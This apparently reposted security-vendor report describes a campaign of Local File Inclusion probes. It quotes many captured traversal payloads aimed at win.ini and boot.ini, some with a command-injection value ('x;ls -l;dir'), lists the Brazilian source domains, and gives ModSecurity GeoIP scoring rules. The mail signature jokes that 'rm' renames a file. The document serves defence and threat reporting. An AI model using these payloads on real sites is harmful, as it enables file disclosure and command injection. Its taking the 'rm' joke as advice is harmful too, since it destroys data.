Our web sensors picked up a big uptick in Local File Inclusion (LFI) attacks today. We received 3675 attacks that targeted a wide range of applications all attempting to use directory traversals to access:<br>Windowswin.ini<br>

boot.ini<br>Here is a sampling of attack payloads:<br>GET /forum/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00<br>GET /forum/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00<br>

GET /forum/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00<br>GET /sites/all/libraries/fckeditor/editor/dialog/fck_spellerpages/spellerpages/controls.html?btnUndo=Undo&misword=1&sugg=&txtsugg=../../../../../../../../../../windows/win.ini%00<br>

GET /sites/all/libraries/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFolders&CurrentFolder=/&Type=../../../../../../../../../../windows/win.ini%00<br>GET /sites/all/libraries/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&CurrentFolder=/&Type=../../../../../../../../../../windows/win.ini%00<br>

GET /wp-trackback.php?p=..........................................Windowswin.ini%00<br>GET /take-quiz/index.php?album=../../../../../../../../../../boot.ini%00<br>GET /take-quiz/index.php?album=../../../../../../../../../../boot.ini%00<br>

GET /forum.php?mod=viewthread&tid=..........................................Windowswin.ini%00<br>GET /index.php?main_page=../../../../../../../../../../../../boot.ini%00<br>GET /index.php?main_page=/boot.ini%00<br>GET /index.php?main_page=../../../../../../../../../../../../boot.ini%00<br>

GET /index.php?main_page=/boot.ini%00<br>GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00<br>

GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00<br>GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00<br>

GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00<br>GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00<br>

GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00<br>GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00<br>

GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00<br>GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00<br>

GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00<br>GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00<br>

GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00<br>GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00<br>

GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00<br>GET /index.php?main_page=site_map&zenid=../../../../../../../../../../../../boot.ini%00<br>

GET /index.php?main_page=site_map&zenid=/boot.ini%00<br><br>GET /index.php?main_page=featured_products&zenid=../../../../../../../../../../../../boot.ini%00<br><br>GET /index.php?main_page=featured_products&zenid=/boot.ini%00<br>

<br>GET /index.php?main_page=product_info&products_id=638&zenid=../../../../../../../../../../../../boot.ini%00<br><br>GET /index.php?main_page=product_info&products_id=638&zenid=/boot.ini%00<br><br>GET /index.php?main_page=page&id=1&chapter=0&zenid=../../../../../../../../../../../../boot.ini%00<br>

<br>GET /index.php?main_page=page&id=1&chapter=0&zenid=/boot.ini%00<br><br>GET /index.php?main_page=shippinginfo&zenid=../../../../../../../../../../../../boot.ini%00<br><br>GET /index.php?main_page=shippinginfo&zenid=/boot.ini%00<br>

<br>GET /index.php?main_page=privacy&zenid=../../../../../../../../../../../../boot.ini%00<br><br>GET /index.php?main_page=privacy&zenid=/boot.ini%00<br><br>GET /index.php?main_page=conditions&zenid=../../../../../../../../../../../../boot.ini%00<br>

<br>GET /index.php?main_page=conditions&zenid=/boot.ini%00<br><br>GET /wp-content/plugins/download-monitor/download.php?id=..........................................Windowswin.ini%00<br><br>GET /forums/viewtopic.php?f=11&t=18551&p=444445&hilit=..........................................Windowswin.ini%00<br>

<br>GET /index.php?main_page=contact_us&zenid=../../../../../../../../../../../../boot.ini%00<br><br>GET /index.php?main_page=contact_us&zenid=/boot.ini%00<br><br>GET /index.php?main_page=site_map&zenid=../../../../../../../../../../../../boot.ini%00<br>

<br>GET /index.php?main_page=site_map&zenid=/boot.ini%00<br><br>GET /index.php?main_page=gv_faq&zenid=../../../../../../../../../../../../boot.ini%00<br><br>GET /index.php?main_page=gv_faq&zenid=/boot.ini%00<br>

<br>GET /index.php?main_page=discount_coupon&zenid=../../../../../../../../../../../../boot.ini%00<br><br>GET /index.php?main_page=discount_coupon&zenid=/boot.ini%00<br><br>GET /index.php?main_page=unsubscribe&zenid=../../../../../../../../../../../../boot.ini%00<br>

<br>GET /index.php?main_page=unsubscribe&zenid=/boot.ini%00<br><br>GET /index.php?main_page=reviews&zenid=../../../../../../../../../../../../boot.ini%00<br><br>GET /index.php?main_page=reviews&zenid=/boot.ini%00<br>

<br>GET /index.php?main_page=product_reviews_info&products_id=638&reviews_id=25&zenid=../../../../../../../../../../../../boot.ini%00<br><br>GET /index.php?main_page=product_reviews_info&products_id=638&reviews_id=25&zenid=/boot.ini%00<br>

<br>GET /index.php?main_page=specials&zenid=../../../../../../../../../../../../boot.ini%00<br><br>GET /index.php?main_page=specials&zenid=/boot.ini%00<br><br>GET /index.php?main_page=advanced_search_result&search_in_description=1&zenid=p3hpsf70l0q8pg8sar4t8snr46&keyword=../../../../../../../../../../../../boot.ini%00<br>

<br>GET /index.php?main_page=advanced_search_result&search_in_description=1&zenid=p3hpsf70l0q8pg8sar4t8snr46&keyword=/boot.ini%00<br><br>GET /index.php?main_page=index&manufacturers_id=303&zenid=../../../../../../../../../../../../boot.ini%00<br>

<br>GET /index.php?main_page=index&manufacturers_id=303&zenid=/boot.ini%00<br><br>GET /index.php?main_page=login&zenid=../../../../../../../../../../../../boot.ini%00<br><br>GET /index.php?main_page=login&zenid=/boot.ini%00<br>

<br>GET /index.php?main_page=index&cPath=332&zenid=../../../../../../../../../../../../boot.ini%00<br><br>GET /index.php?main_page=index&cPath=332&zenid=/boot.ini%00<br><br>GET /index.php?main_page=featured_products&zenid=../../../../../../../../../../../../boot.ini%00<br>

<br>GET /index.php?main_page=featured_products&zenid=/boot.ini%00<br><br>GET /index.php?showtopic=..........................................Windowswin.ini%00<br><br>GET /index.php?main_page=product_info&products_id=49354&zenid=../../../../../../../../../../../../boot.ini%00<br>

<br>GET /index.php?main_page=product_info&products_id=49354&zenid=/boot.ini%00<br><br><br>We identified this attack through two methods of our commercial rules feed:<br>LFI virtual patching rules<br>A big increase in unique malicious IP addresses (for our IP Reputation Feed). We normally have between 500-800 IP addresses in our list per-day. Today's IP Reputation Blacklist jumped up to 2339.<br>

After analyzing the source IP addresses, it was clear that this LFI attack campaign was orchestrated by attacker(s) in Brazil. Here is a listing of the Brazillian domains we identified:<br><a href="http://ac.gov.br">ac.gov.br</a><br>

<a href="http://aerotelecom.com.br">aerotelecom.com.br</a><br><a href="http://ampernet.com.br">ampernet.com.br</a><br><a href="http://atena.anhembi.ind.br">atena.anhembi.ind.br</a><br><a href="http://brma.santacasasp.org.br">brma.santacasasp.org.br</a><br>

<a href="http://cable.cabotelecom.com.br">cable.cabotelecom.com.br</a><br><a href="http://cable.infolic.com.br">cable.infolic.com.br</a><br><a href="http://certelnet.com.br">certelnet.com.br</a><br><a href="http://cianetwork.com.br">cianetwork.com.br</a><br>

<a href="http://claro.net.br">claro.net.br</a><br><a href="http://cpnet.com.br">cpnet.com.br</a><br><a href="http://customer.tdatabrasil.net.br">customer.tdatabrasil.net.br</a><br><a href="http://customer.telesp.net.br">customer.telesp.net.br</a><br>

<a href="http://dedicated.neoviatelecom.com.br">dedicated.neoviatelecom.com.br</a><br><a href="http://ded.intelignet.com.br">ded.intelignet.com.br</a><br><a href="http://ded.srt.net.br">ded.srt.net.br</a><br><a href="http://desktop.com.br">desktop.com.br</a><br>

<a href="http://dezinternet.com.br">dezinternet.com.br</a><br><a href="http://dial-up.telesp.net.br">dial-up.telesp.net.br</a><br><a href="http://din.wln.net.br">din.wln.net.br</a><br><a href="http://dsl.brasiltelecom.net.br">dsl.brasiltelecom.net.br</a><br>

<a href="http://dsl.ccoce700.brasiltelecom.net.br">dsl.ccoce700.brasiltelecom.net.br</a><br><a href="http://dsl.pmjce700.brasiltelecom.net.br">dsl.pmjce700.brasiltelecom.net.br</a><br><a href="http://dsl.telesp.net.br">dsl.telesp.net.br</a><br>

<a href="http://dynamic.adsl.gvt.net.br">dynamic.adsl.gvt.net.br</a><br><a href="http://dynamic.conectcor.com.br">dynamic.conectcor.com.br</a><br><a href="http://dynamic.dialup.gvt.net.br">dynamic.dialup.gvt.net.br</a><br>

<a href="http://dynamic.idial.com.br">dynamic.idial.com.br</a><br><a href="http://dynamic.neoviatelecom.com.br">dynamic.neoviatelecom.com.br</a><br><a href="http://e.brasiltelecom.net.br">e.brasiltelecom.net.br</a><br><a href="http://e.ccoce700.brasiltelecom.net.br">e.ccoce700.brasiltelecom.net.br</a><br>

<a href="http://e.pmjce700.brasiltelecom.net.br">e.pmjce700.brasiltelecom.net.br</a><br><a href="http://fia.com.br">fia.com.br</a><br><a href="http://fw-cruz2.mma.com.br">fw-cruz2.mma.com.br</a><br><a href="http://gaccbahia.sdr.gvt.net.br">gaccbahia.sdr.gvt.net.br</a><br>

<a href="http://gate.futurecomp.com.br">gate.futurecomp.com.br</a><br><a href="http://geoposition.com.br">geoposition.com.br</a><br><a href="http://gw-acad-pf.upf.br">gw-acad-pf.upf.br</a><br><a href="http://hc-gw.unicamp.br">hc-gw.unicamp.br</a><br>

<a href="http://host.gvt.net.br">host.gvt.net.br</a><br><a href="http://http.kraftweb.com.br">http.kraftweb.com.br</a><br><a href="http://ibys.com.br">ibys.com.br</a><br><a href="http://i-next.psi.br">i-next.psi.br</a><br>

<a href="http://intercampo.com.br">intercampo.com.br</a><br><a href="http://interline.net.br">interline.net.br</a><br><a href="http://ip18.unb.org.br">ip18.unb.org.br</a><br><a href="http://ipd.brasiltelecom.net.br">ipd.brasiltelecom.net.br</a><br>

<a href="http://ipd.brcentral.net.br">ipd.brcentral.net.br</a><br><a href="http://isa2.eptv.com.br">isa2.eptv.com.br</a><br><a href="http://isp.timbrasil.com.br">isp.timbrasil.com.br</a><br><a href="http://itake.net.br">itake.net.br</a><br>

<a href="http://jupiter.sulpol.com.br">jupiter.sulpol.com.br</a><br><a href="http://kratos.tdkom.psi.br">kratos.tdkom.psi.br</a><br><a href="http://mail01.fundacaoaltinoventura.org.br">mail01.fundacaoaltinoventura.org.br</a><br>

<a href="http://mail2.metroval.com.br">mail2.metroval.com.br</a><br><a href="http://mail6.aralco.com.br">mail6.aralco.com.br</a><br><a href="http://mail.aralco.com.br">mail.aralco.com.br</a><br><a href="http://mail.centraldopapel.com.br">mail.centraldopapel.com.br</a><br>

<a href="http://mail.hci.ind.br">mail.hci.ind.br</a><br><a href="http://mail.nardini.ind.br">mail.nardini.ind.br</a><br><a href="http://marinter.com.br">marinter.com.br</a><br><a href="http://marte.ceron.com.br">marte.ceron.com.br</a><br>

<a href="http://mhnet.com.br">mhnet.com.br</a><br><a href="http://minasmaistelecom.com.br">minasmaistelecom.com.br</a><br><a href="http://mobile.jabursat.com.br">mobile.jabursat.com.br</a><br><a href="http://mx.0.rossi.com.br">mx.0.rossi.com.br</a><br>

<a href="http://neowave.com.br">neowave.com.br</a><br><a href="http://nereu.vipway.net.br">nereu.vipway.net.br</a><br><a href="http://nqt.com.br">nqt.com.br</a><br><a href="http://ns1.vipel.ind.br">ns1.vipel.ind.br</a><br>

<a href="http://ns.argosguindastes.com.br">ns.argosguindastes.com.br</a><br><a href="http://osprey2.certelnet.com.br">osprey2.certelnet.com.br</a><br><a href="http://osprey.certelnet.com.br">osprey.certelnet.com.br</a><br>

<a href="http://p4net.com.br">p4net.com.br</a><br><a href="http://poolip.BHE.embratel.net.br">poolip.BHE.embratel.net.br</a><br><a href="http://prontonet.com.br">prontonet.com.br</a><br><a href="http://provale.com.br">provale.com.br</a><br>

<a href="http://proxy1.recife.pe.gov.br">proxy1.recife.pe.gov.br</a><br><a href="http://rco.gvt.net.br">rco.gvt.net.br</a><br><a href="http://res-com.wayinternet.com.br">res-com.wayinternet.com.br</a><br><a href="http://res-com.wayinternet.com.br">res-com.wayinternet.com.br</a><br>

<a href="http://rline.com.br">rline.com.br</a><br><a href="http://sercomtel.com.br">sercomtel.com.br</a><br><a href="http://server.smsr.com.br">server.smsr.com.br</a><br><a href="http://servidor1.actioncentro.net.br">servidor1.actioncentro.net.br</a><br>

<a href="http://speedycti.com.br">speedycti.com.br</a><br><a href="http://srv.tecnolab.com.br">srv.tecnolab.com.br</a><br><a href="http://static.ctbctelecom.com.br">static.ctbctelecom.com.br</a><br><a href="http://static.gotelecom.com.br">static.gotelecom.com.br</a><br>

<a href="http://static.gvt.net.br">static.gvt.net.br</a><br><a href="http://static.impsat.net.br">static.impsat.net.br</a><br><a href="http://static.ntbr.com.br">static.ntbr.com.br</a><br><a href="http://static-pr082.redetelesul.com.br">static-pr082.redetelesul.com.br</a><br>

<a href="http://static.spo.ctbc.com.br">static.spo.ctbc.com.br</a><br><a href="http://static.starweb.net.br">static.starweb.net.br</a><br><a href="http://static.stech.net.br">static.stech.net.br</a><br><a href="http://static-stz.convex.com.br">static-stz.convex.com.br</a><br>

<a href="http://tcvnet.com.br">tcvnet.com.br</a><br><a href="http://telemar.net.br">telemar.net.br</a><br><a href="http://tpa.net.br">tpa.net.br</a><br><a href="http://tpnet.psi.br">tpnet.psi.br</a><br><a href="http://ufpa.br">ufpa.br</a><br>

<a href="http://uninetbsb.com.br">uninetbsb.com.br</a><br><a href="http://unotel.com.br">unotel.com.br</a><br><a href="http://user.ajato.com.br">user.ajato.com.br</a><br><a href="http://user.dynamic.dipelnet.com.br">user.dynamic.dipelnet.com.br</a><br>

<a href="http://user.superilinhares.com.br">user.superilinhares.com.br</a><br><a href="http://user.superitelecom.com.br">user.superitelecom.com.br</a><br><a href="http://user.veloxzone.com.br">user.veloxzone.com.br</a><br>

<a href="http://user.vivozap.com.br">user.vivozap.com.br</a><br><a href="http://v4.naclick.com.br">v4.naclick.com.br</a><br><a href="http://veiculos.jelta.com.br">veiculos.jelta.com.br</a><br><a href="http://viacaboip.com.br">viacaboip.com.br</a><br>

<a href="http://viaembratel.net.br">viaembratel.net.br</a><br><a href="http://viafibra.com.br">viafibra.com.br</a><br><a href="http://virtua.com.br">virtua.com.br</a><br><a href="http://wcs.net.br">wcs.net.br</a><br><a href="http://web.ceralpisos.com.br">web.ceralpisos.com.br</a><br>

<a href="http://webmail.ro.senac.br">webmail.ro.senac.br</a><br><a href="http://wifi.tcheturbo.com.br">wifi.tcheturbo.com.br</a><br><a href="http://wlan.lpnet.com.br">wlan.lpnet.com.br</a><br><a href="http://www2.ceralpisos.com.br">www2.ceralpisos.com.br</a><br>

<a href="http://xd-dynamic.ctbcnetsuper.com.br">xd-dynamic.ctbcnetsuper.com.br</a><br><a href="http://xdsl-dinamico.ctbcnetsuper.com.br">xdsl-dinamico.ctbcnetsuper.com.br</a><br>Assigning Risk Scores<br>If you are using ModSecurity to protect your web applications, and your user-base does not normally originate in Brazil, you may want to consider implementing some GeoIP rules to help raise the potential Threat Score.<br>

SecGeoLookupDb /path/to/apache/conf/base_rules/GeoLiteCity.dat<br><br>SecRule REMOTE_ADDR "@geoLookup" "phase:1,t:none,nolog,pass"<br><br>SecRule GEO:COUNTRY_CODE "@pm BR" "phase:1,t:none,log,pass,msg:'High Risk Source Location',setvar:tx.threat_score=+10"<br>

This would raise the Threat Score for this transaction. You could, however, even block based solely on this information if you were sure that you have no legitimate clients from this geographic location. Simply change the "pass" action to "block".<br clear="all">

<br>-- <br>" Eu quero saber como renomear um arquivo " ele diz. <br>Por favor,  dia de pagamento, no ?! Mas eu estou de bom humor. <br>" Claro. Basta dar 'rm' e o nome do arquivo " <br>" Obrigado "<br>

<br>Noilson Caio T. de Arajo<br>Linux Professional Institute Certification<br>LPI000182893<br>Novell Certified Linux Administrator (CLA)<br>10111916<br>Novell Data Center Technical Specialist<br><a href="http://ncaio.ithub.com.br" target="_blank">http://ncaio.ithub.com.br</a><br>

<a href="http://www.commandlinefu.com/commands/by/ncaio" target="_blank">http://www.commandlinefu.com/commands/by/ncaio</a><br><a href="http://www.dicas-l.com.br/autores/noilsoncaioteixeiradearaujo.php" target="_blank">http://www.dicas-l.com.br/autores/noilsoncaioteixeiradearaujo.php</a><br>

 <br>